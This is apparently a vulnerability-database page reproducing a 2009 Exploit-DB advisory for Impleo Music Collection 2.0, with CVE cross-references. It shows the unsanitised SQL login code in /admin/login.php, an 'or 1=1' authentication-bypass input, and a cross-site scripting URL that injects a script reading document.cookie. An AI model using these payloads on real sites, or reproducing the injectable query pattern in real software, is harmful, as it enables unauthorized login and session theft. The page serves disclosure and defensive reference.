Lucene search
+L

impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting

🗓️ 15 Jun 2009 00:00:00Reported by SirGodType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 46 Views

Impleo Music Collection 2.0 SQL Injection and Cross-Site Scripting vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2009-2153
22 Jun 200914:30
attackerkb
attackerkb
ATTACKERKB
CVE-2009-2154
22 Jun 200914:30
attackerkb
circl
Circl
CVE-2009-2153
15 Jun 200900:00
circl
circl
Circl
CVE-2009-2154
15 Jun 200900:00
circl
cve
CVE
CVE-2009-2153
22 Jun 200914:00
cve
cve
CVE
CVE-2009-2154
22 Jun 200914:00
cve
cvelist
Cvelist
CVE-2009-2153
22 Jun 200914:00
cvelist
cvelist
Cvelist
CVE-2009-2154
22 Jun 200914:00
cvelist
euvd
EUVD
EUVD-2009-2149
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2009-2150
7 Oct 202500:30
euvd
Rows per page
#################################################################################################################
[+] Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities
[+] Download: http://sappy.dk/impleo/download-impleo
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################

[+] SQL Injection ( Auth Bypass )

- Requirements : magic_quotes_gpc = off

- Vulnerable code in /admin/login.php

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 $postbruger = $_POST['username'];
 $postpass = md5($_POST['password']);
 $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
or die("<p>" . mysql_error() . "</p>\n");
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

- PoC

  Login Username : admin ' or ' 1=1
  Login Password : anything


[+] Cross Site Scripting

- PoC

    http://127.0.0.1/[path]/index.php?sort="><script>alert(document.cookie)</script>

#################################################################################################################

# milw0rm.com [2009-06-15]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation